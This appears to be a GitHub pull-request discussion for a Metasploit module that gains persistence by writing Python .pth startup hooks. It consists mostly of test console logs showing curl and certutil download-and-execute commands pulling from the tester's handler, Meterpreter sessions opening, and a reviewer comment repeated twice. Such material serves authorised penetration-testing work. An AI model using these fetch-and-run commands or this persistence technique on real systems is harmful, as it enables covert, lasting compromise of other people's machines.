Adds module for python site-specific hook persistence

[msutovsky-r7]

Work in progress

This module leverages Python's startup mechanism, where some files can be automically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.

Verification Steps

Example steps in this format (is also in the PR):

1. Start msfconsole
2. Get a session
3. Do: use multi/persistence/python_site_specific_hook
4. Do: set session #
5. Do: run

Options

PYTHON_HOOK_PATH

If user has session to target machine with non-typical Python paths, they can set their own path to Python hooks.

EXECUTION_TARGET

Python has multiple locations, where it can store startup hooks. This option specifies if the target location should be SYSTEM one - i.e. should affect all users - or USER one, which targets current user.

Scenarios

Linux pop-os 6.17.4-76061704-generic

msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true
[*] Command to run on remote host: curl -so ./xtLDGMnHcvHv http://192.168.3.7:8080/EO6WzfXF6CGyqdBiy1rT5w;chmod +x ./xtLDGMnHcvHv;./xtLDGMnHcvHv&
[*] Exploit running as background job 9.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /EO6WzfXF6CGyqdBiy1rT5w
msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.10
[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/
[*] Creating directory /usr/local/lib/python3.10/dist-packages/
[*] /usr/local/lib/python3.10/dist-packages/ created
[*] Client 192.168.3.7 requested /EO6WzfXF6CGyqdBiy1rT5w
[*] Sending payload to 192.168.3.7 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.3.7
[*] Meterpreter session 4 opened (192.168.3.7:4444 -> 192.168.3.7:34170) at 2025-11-19 07:04:54 +0100

msf exploit(multi/persistence/python_site_specific_hook) > sessions 4
[*] Starting interaction with 4...

meterpreter > sysinfo
Computer     : 172.16.187.129
OS           : Pop 22.04 (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: ms

Windows 10.0.15063

msf exploit(multi/persistence/python_site_specific_hook) > run verbose=true
[*] Command to run on remote host: certutil -urlcache -f http://192.168.3.7:8080/P0P_l8MTdDPpi4BXoUKxZw %TEMP%\RAKYJqUXyJK.exe & start /B %TEMP%\RAKYJqUXyJK.exe
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Fetch handler listening on 192.168.3.7:8080
[*] HTTP server started
[*] Adding resource /P0P_l8MTdDPpi4BXoUKxZw
[*] Started reverse TCP handler on 192.168.3.7:9999
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:\Users\msfuser/AppData/Local/Programs/Python/Python313/Lib/site-packages/
[*] Client 10.5.132.155 requested /P0P_l8MTdDPpi4BXoUKxZw
[*] Sending payload to 10.5.132.155 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.155 requested /P0P_l8MTdDPpi4BXoUKxZw
[*] Sending payload to 10.5.132.155 (CertUtil URL Agent)
[*] Sending stage (230982 bytes) to 10.5.132.155
[*] Meterpreter session 3 opened (192.168.3.7:9999 -> 10.5.132.155:51726) at 2025-11-19 07:52:00 +0100

msf exploit(multi/persistence/python_site_specific_hook) > sessions  3
[*] Starting interaction with 3...

meterpreter > sysinfo
Computer        : WIN10_1703_1018
OS              : Windows 10 1703 (10.0 Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN10_1703_1018\msfuser

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[jheysel-r7]

Nice work @msutovsky-r7! Ran into some issues testing Windows but the Linux side works great

Testing

Linux

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4004
msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.10
[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/
[+] Successfully created malicious hook /usr/local/lib/python3.10/dist-packages/txPYHioeQt.pth
[*] Sending stage (3090404 bytes) to 172.16.199.136
[*] Meterpreter session 2 opened (172.16.199.1:4004 -> 172.16.199.136:47470) at 2025-12-09 11:37:23 -0800

msf exploit(multi/persistence/python_site_specific_hook) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
syServer username: root
smeterpreter > sysinfo
Computer     : 172.16.199.136
OS           : Ubuntu 22.04 (Linux 6.8.0-87-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Windows failure when EXECUTION_TARGET = USER

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:7721
msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:\Users\msfsuer/AppData/Local/Programs/Python/Python313/Lib/site-packages/
[-] Exploit aborted due to failure: payload-failed: Failed to create malicious hook

And when EXECUTION_TARGET = SYSTEM

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:/Python313/Lib/site-packages/
[-] Exploit aborted due to failure: payload-failed: Failed to create malicious hook

I installed python3 via the Microsoft app store as was suggested by the OS and the interpreter gets installed here:

C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0>dir
 Volume in drive C has no label.
 Volume Serial Number is 024F-CE8D

 Directory of C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0

12/09/2025  11:45 AM    <DIR>          .
12/09/2025  11:45 AM    <DIR>          ..
12/09/2025  11:45 AM         1,042,354 AppxBlockMap.xml
12/09/2025  11:45 AM             9,134 AppxManifest.xml
12/09/2025  11:45 AM    <DIR>          AppxMetadata
12/09/2025  11:45 AM            12,190 AppxSignature.p7x
12/09/2025  11:45 AM            23,092 classicAppCompat.sccd
12/09/2025  11:45 AM    <DIR>          DLLs
12/09/2025  11:45 AM           170,840 idle3.13.exe
12/09/2025  11:45 AM    <DIR>          include
12/09/2025  11:45 AM    <DIR>          Lib
12/09/2025  11:45 AM    <DIR>          libs
12/09/2025  11:45 AM            33,861 LICENSE.txt
12/09/2025  11:45 AM           171,864 pip3.13.exe
12/09/2025  11:45 AM           171,864 python.exe
12/09/2025  11:45 AM           171,864 python3.13.exe
12/09/2025  11:45 AM            72,536 python3.dll
12/09/2025  11:45 AM         6,125,912 python313.dll
12/09/2025  11:45 AM           170,840 pythonw.exe
12/09/2025  11:45 AM           170,840 pythonw3.13.exe
12/09/2025  11:45 AM           632,360 resources.pri
12/09/2025  11:45 AM    <DIR>          tcl
07/22/2025  02:12 PM           120,400 vcruntime140.dll
07/22/2025  02:12 PM            49,776 vcruntime140_1.dll
12/09/2025  11:45 AM    <DIR>          _resources
              16 File(s)      9,149,727 bytes
               9 Dir(s)  20,178,419,712 bytes free

We should account for the possibility of python being installed this way, apparently "C:\Program Files\WindowsApps" is a protected folder that one on not even admins can write to which is where "site-packages" gets installed.

msf exploit(multi/persistence/python_site_specific_hook) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  4         meterpreter x64/windows  DESKTOP-0OPTL76\Administrator @ DESKTOP-0OPTL76  172.16.199.1:9931 -> 172.16.199.141:50110 (172.16.199.141)

msf exploit(multi/persistence/python_site_specific_hook) > options

Module options (exploit/multi/persistence/python_site_specific_hook):

   Name              Current Setting                                      Required  Description
   ----              ---------------                                      --------  -----------
   EXECUTION_TARGET  SYSTEM                                               yes       Selects if persistence is installed under current user or for all users (Accepted: USER, SYSTEM
                                                                                    )
   PYTHON_HOOK_PATH  C:\Program Files\WindowsApps\PythonSoftwareFoundati  no        The path to Python site-specific hook directory
                     on.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0\Lib\s
                     ite-packages
   SESSION           -1                                                   yes       The session to run this module on


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      WBzIMgefwZR      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               7721             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0\Lib\site-packages
[-] Exploit aborted due to failure: payload-failed: Failed to create malicious hook

[jheysel-r7]

Suggested change

Example steps in this format (is also in the PR):

[msutovsky-r7]

Nice work @msutovsky-r7! Ran into some issues testing Windows but the Linux side works great

Testing

Linux

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4004
msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.10
[*] Got path to site-specific hooks /usr/local/lib/python3.10/dist-packages/
[+] Successfully created malicious hook /usr/local/lib/python3.10/dist-packages/txPYHioeQt.pth
[*] Sending stage (3090404 bytes) to 172.16.199.136
[*] Meterpreter session 2 opened (172.16.199.1:4004 -> 172.16.199.136:47470) at 2025-12-09 11:37:23 -0800

msf exploit(multi/persistence/python_site_specific_hook) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
syServer username: root
smeterpreter > sysinfo
Computer     : 172.16.199.136
OS           : Ubuntu 22.04 (Linux 6.8.0-87-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Windows failure when EXECUTION_TARGET = USER

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:7721
msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:\Users\msfsuer/AppData/Local/Programs/Python/Python313/Lib/site-packages/
[-] Exploit aborted due to failure: payload-failed: Failed to create malicious hook

And when EXECUTION_TARGET = SYSTEM

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:/Python313/Lib/site-packages/
[-] Exploit aborted due to failure: payload-failed: Failed to create malicious hook

I installed python3 via the Microsoft app store as was suggested by the OS and the interpreter gets installed here:

C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0>dir
 Volume in drive C has no label.
 Volume Serial Number is 024F-CE8D

 Directory of C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0

12/09/2025  11:45 AM    <DIR>          .
12/09/2025  11:45 AM    <DIR>          ..
12/09/2025  11:45 AM         1,042,354 AppxBlockMap.xml
12/09/2025  11:45 AM             9,134 AppxManifest.xml
12/09/2025  11:45 AM    <DIR>          AppxMetadata
12/09/2025  11:45 AM            12,190 AppxSignature.p7x
12/09/2025  11:45 AM            23,092 classicAppCompat.sccd
12/09/2025  11:45 AM    <DIR>          DLLs
12/09/2025  11:45 AM           170,840 idle3.13.exe
12/09/2025  11:45 AM    <DIR>          include
12/09/2025  11:45 AM    <DIR>          Lib
12/09/2025  11:45 AM    <DIR>          libs
12/09/2025  11:45 AM            33,861 LICENSE.txt
12/09/2025  11:45 AM           171,864 pip3.13.exe
12/09/2025  11:45 AM           171,864 python.exe
12/09/2025  11:45 AM           171,864 python3.13.exe
12/09/2025  11:45 AM            72,536 python3.dll
12/09/2025  11:45 AM         6,125,912 python313.dll
12/09/2025  11:45 AM           170,840 pythonw.exe
12/09/2025  11:45 AM           170,840 pythonw3.13.exe
12/09/2025  11:45 AM           632,360 resources.pri
12/09/2025  11:45 AM    <DIR>          tcl
07/22/2025  02:12 PM           120,400 vcruntime140.dll
07/22/2025  02:12 PM            49,776 vcruntime140_1.dll
12/09/2025  11:45 AM    <DIR>          _resources
              16 File(s)      9,149,727 bytes
               9 Dir(s)  20,178,419,712 bytes free

We should account for the possibility of python being installed this way, apparently "C:\Program Files\WindowsApps" is a protected folder that one on not even admins can write to which is where "site-packages" gets installed.

msf exploit(multi/persistence/python_site_specific_hook) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  4         meterpreter x64/windows  DESKTOP-0OPTL76\Administrator @ DESKTOP-0OPTL76  172.16.199.1:9931 -> 172.16.199.141:50110 (172.16.199.141)

msf exploit(multi/persistence/python_site_specific_hook) > options

Module options (exploit/multi/persistence/python_site_specific_hook):

   Name              Current Setting                                      Required  Description
   ----              ---------------                                      --------  -----------
   EXECUTION_TARGET  SYSTEM                                               yes       Selects if persistence is installed under current user or for all users (Accepted: USER, SYSTEM
                                                                                    )
   PYTHON_HOOK_PATH  C:\Program Files\WindowsApps\PythonSoftwareFoundati  no        The path to Python site-specific hook directory
                     on.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0\Lib\s
                     ite-packages
   SESSION           -1                                                   yes       The session to run this module on


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      WBzIMgefwZR      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT               7721             yes       The listen port


   When FETCH_COMMAND is one of CURL:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


Exploit target:

   Id  Name
   --  ----
   0   Auto



View the full module info with the info, or info -d command.

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[*] Got path to site-specific hooks C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0\Lib\site-packages
[-] Exploit aborted due to failure: payload-failed: Failed to create malicious hook

Would you mind share details of how you installed the Python on Windows? I did try with the Microsoft store and it got saved into directory C:\Python313\

meterpreter > ls C:/Python313
Listing: C:/Python313
=====================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
040777/rwxrwxrwx  0        dir   2025-03-11 17:28:25 +0100  DLLs
040777/rwxrwxrwx  0        dir   2025-03-11 17:28:21 +0100  Doc
100666/rw-rw-rw-  33861    fil   2024-12-04 04:58:12 +0100  LICENSE.txt
040777/rwxrwxrwx  65536    dir   2025-03-11 17:28:24 +0100  Lib
100666/rw-rw-rw-  1953015  fil   2024-12-04 04:59:58 +0100  NEWS.txt
040777/rwxrwxrwx  0        dir   2025-03-11 17:28:30 +0100  Scripts
040777/rwxrwxrwx  0        dir   2025-03-11 17:28:13 +0100  include
040777/rwxrwxrwx  0        dir   2025-03-11 17:28:24 +0100  libs
100777/rwxrwxrwx  105840   fil   2024-12-04 04:58:12 +0100  python.exe
100666/rw-rw-rw-  72560    fil   2024-12-04 04:58:12 +0100  python3.dll
100666/rw-rw-rw-  6093816  fil   2024-12-04 04:58:12 +0100  python313.dll
100777/rwxrwxrwx  104304   fil   2024-12-04 04:58:12 +0100  pythonw.exe
040777/rwxrwxrwx  0        dir   2025-03-11 17:28:25 +0100  tcl
100666/rw-rw-rw-  120400   fil   2024-12-04 04:58:12 +0100  vcruntime140.dll
100666/rw-rw-rw-  49744    fil   2024-12-04 04:58:12 +0100  vcruntime140_1.dll

[jheysel-r7]

Hey @msutovsky-r7, on Windows 10 [Version 10.0.19045.6466] before python3 is installed, I typed python3 into the command prompt and it automatically brings up the Microsoft store. From there I click "Get" and then it installs python3 in:

C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0\

with a shim in:

C:\Users\msfsuer\AppData\Local\Microsoft\WindowsApps\

Here's a brief screen recording of the process/ showing that these directories did not exist prior to installing. Is this how you installed from the Microsoft store? Could it be due to difference in Windows versions?

[msutovsky-r7]

Hey @jheysel-r7, I've added check if the target hook directory exists and if it is writable. The original idea was that if the target system has some different hooks path, they can use PYTHON_HOOK_PATH to specify it, but there's additional check for correct permissions as well. Let me know if it makes sense to you!

[jheysel-r7]

Thanks for making that change @msutovsky-r7! Makes sense and testing checks out 👍

While testing I added two final suggestion comments, once those are addressed I think this will be good to land.

Testing

No write access to PYTHON_HOOK_PATH

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
msf exploit(multi/persistence/python_site_specific_hook) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.13
[-] Exploit aborted due to failure: no-access: No permission to write to C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.13_3.13.2544.0_x64__qbz5n2kfra8p0\
[*] 172.16.199.141 - Meterpreter session 1 closed.  Reason: Died

Successful run on Windows (session has write access to PYTHON_HOOK_PATH)

msf exploit(multi/persistence/python_site_specific_hook) > set session -1
session => -1
msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:5555
msf exploit(multi/persistence/python_site_specific_hook) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.14
[*] Got path to site-specific hooks C:\Users\msfsuer/AppData/Local/Programs/Python/Python314/Lib/site-packages/
[+] Successfully created malicious hook C:\Users\msfsuer/AppData/Local/Programs/Python/Python314/Lib/site-packages/ZvGglX.pth

msf exploit(multi/persistence/python_site_specific_hook) >
[*] Sending stage (230982 bytes) to 172.16.199.141
[*] Meterpreter session 2 opened (172.16.199.1:5555 -> 172.16.199.141:51010) at 2026-01-05 16:50:44 -0800

msf exploit(multi/persistence/python_site_specific_hook) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: DESKTOP-0OPTL76\msfsuer
meterpreter > sysinfo
Computer        : DESKTOP-0OPTL76
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

[jheysel-r7]

Thanks @msutovsky-r7. Testing on the latest commit was successful. The failing CI test are known, rebasing would fix them but to avoid more back and forth I'll just land this PR now 🫡

Testing

msf exploit(multi/persistence/python_site_specific_hook) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:3343
[*] Running automatic check ("set AutoCheck false" to disable)
msf exploit(multi/persistence/python_site_specific_hook) > [+] The target is vulnerable. Python is present on the system
[*] Detected Python version 3.14
[*] Got path to site-specific hooks C:\Users\msfsuer/AppData/Local/Programs/Python/Python314/Lib/site-packages/
[+] Successfully created malicious hook C:\Users\msfsuer/AppData/Local/Programs/Python/Python314/Lib/site-packages/hRWIb.pth
[*] Meterpreter-compatible Cleanup RC file: /Users/jheysel/.msf4/logs/persistence/DESKTOP-0OPTL76_20260106.1155/DESKTOP-0OPTL76_20260106.1155.rc
[*] Sending stage (230982 bytes) to 172.16.199.141
[*] Meterpreter session 2 opened (172.16.199.1:3343 -> 172.16.199.141:57472) at 2026-01-06 16:14:31 -0800

[jheysel-r7]

Release Notes

This adds a persistence module which leverages Python's startup mechanism, where some files can be automatically processed during the initialization of the Python interpreter. One of those files are startup hooks (site-specific, dist-packages). If these files are present in site-specific or dist-packages directories, any lines beginning with import will be executed automatically. This creates a persistence mechanism, if an attacker has established access to target machine with sufficient permissions.